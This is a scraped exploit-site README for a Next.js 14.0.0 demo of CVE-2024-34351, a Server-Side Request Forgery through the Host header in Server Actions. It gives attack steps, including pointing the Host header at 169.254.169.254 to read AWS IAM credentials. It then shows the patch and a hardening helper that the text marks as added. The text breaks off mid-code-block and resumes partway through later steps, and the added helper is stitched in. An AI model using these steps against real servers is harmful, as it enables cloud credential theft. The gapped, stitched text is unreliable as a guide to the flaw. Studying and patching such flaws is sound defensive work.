## https://sploitus.com/exploit?id=D44A9ADD-6B84-5A4A-861B-32D302D10AA9
# CVE-2024-34351 Demo
Minimal Next.js 14.0.0 application for demonstrating CVE-2024-34351 -- a Server-Side Request Forgery (SSRF) vulnerability in Next.js Server Actions.
Discovered by **Adam Kues** and **Shubham Shah** at [Assetnote](https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps). Fixed in Next.js 14.1.1.
---
## How the vulnerability works
When a Server Action calls `redirect('/some-path')`, Next.js builds an internal fetch URL using the `Host` header from the incoming request without validation:
```typescript
// Vulnerable code in createRedirectRenderResult (Next.js
```

`…:8888` and forward. The attacker server responds to HEAD with `Content-Type: text/x-component`, triggering the GET. The full response body is returned inside the Next.js response, visible in Burp.
### Step 3 -- AWS metadata escalation (on EC2)
When running the vulnerable app on an AWS EC2 instance, set the Host header to:
```
Host: 169.254.169.254
```
Next.js will fetch from the instance metadata service. To retrieve IAM credentials, adjust the redirect path or use a follow-up request to target:
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
The full metadata response is returned to the attacker's browser.
---
## The patch (Next.js 14.1.1)
```typescript
// Patched -- no longer reads from the attacker-controlled request header
const host = (staticGenerationStore.incrementalCache as any)?.__nextHostnamePort
?? process.env.__NEXT_PRIVATE_ORIGIN
?? req.headers['host']
```
The fix prefers `process.env.__NEXT_PRIVATE_ORIGIN` -- set at server startup, not controllable by the attacker.
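The hardening the patch describes, written as a stand-alone helper so the "Host header becomes fetch target" bug and its fix can be compared side by side. This is an added example, not code from Next.js or the demo app; `OriginPolicy`, `configuredOrigin` (assumed to carry the same value as `process.env.__NEXT_PRIVATE_ORIGIN`) and `allowedHosts` are names introduced here.

```typescript
// Added example, not Next.js or demo-app code. The origin for the internal
// fetch comes from startup configuration first; the request's Host header is
// accepted only when it is on an explicit allowlist of hostnames this
// deployment is actually served under.

type RequestHeaders = Record<string, string | undefined>;

interface OriginPolicy {
  configuredOrigin?: string; // assumed to mirror process.env.__NEXT_PRIVATE_ORIGIN
  allowedHosts: string[];    // host[:port] values this deployment answers for
  proto?: 'http' | 'https';  // scheme used when falling back to the Host header
}

// Vulnerable shape, for contrast: whatever Host the client sent becomes the target.
function vulnerableFetchUrl(headers: RequestHeaders, redirectPath: string): string {
  return `https://${headers['host']}${redirectPath}`;
}

function resolveInternalOrigin(headers: RequestHeaders, policy: OriginPolicy): string {
  if (policy.configuredOrigin) {
    // Fixed at server start; the client cannot influence it.
    return new URL(policy.configuredOrigin).origin;
  }
  const rawHost = headers['host'];
  if (!rawHost) throw new Error('missing Host header');
  // Parse through URL to normalise case and reject malformed values.
  const host = new URL(`http://${rawHost}`).host;
  const allowed = policy.allowedHosts.map((h) => h.toLowerCase());
  if (!allowed.includes(host)) {
    throw new Error(`Host header "${rawHost}" is not a configured hostname`);
  }
  return `${policy.proto ?? 'https'}://${host}`;
}

function hardenedFetchUrl(headers: RequestHeaders, policy: OriginPolicy, redirectPath: string): string {
  // Only same-app relative redirects may be resolved server-side.
  if (!redirectPath.startsWith('/') || redirectPath.startsWith('//')) {
    throw new Error('redirect target must be a relative path');
  }
  return new URL(redirectPath, resolveInternalOrigin(headers, policy)).toString();
}
```

With a configured origin, a forged `Host: 169.254.169.254` is simply ignored; without one, the same header is rejected because it is not an allowlisted hostname, which is also a useful event to log.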
---
## References
- [Assetnote Research Post](https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps)
- [Assetnote Advisory](https://www.assetnote.io/resources/research/advisory-next-js-ssrf-cve-2024-34351)
- [GitHub Advisory GHSA-fr5h-rqp8-mj6g](https://github.com/advisories/GHSA-fr5h-rqp8-mj6g)
- [NVD CVE-2024-34351](https://nvd.nist.gov/vuln/detail/CVE-2024-34351)
- [Patch PR #62561](https://github.com/vercel/next.js/pull/62561)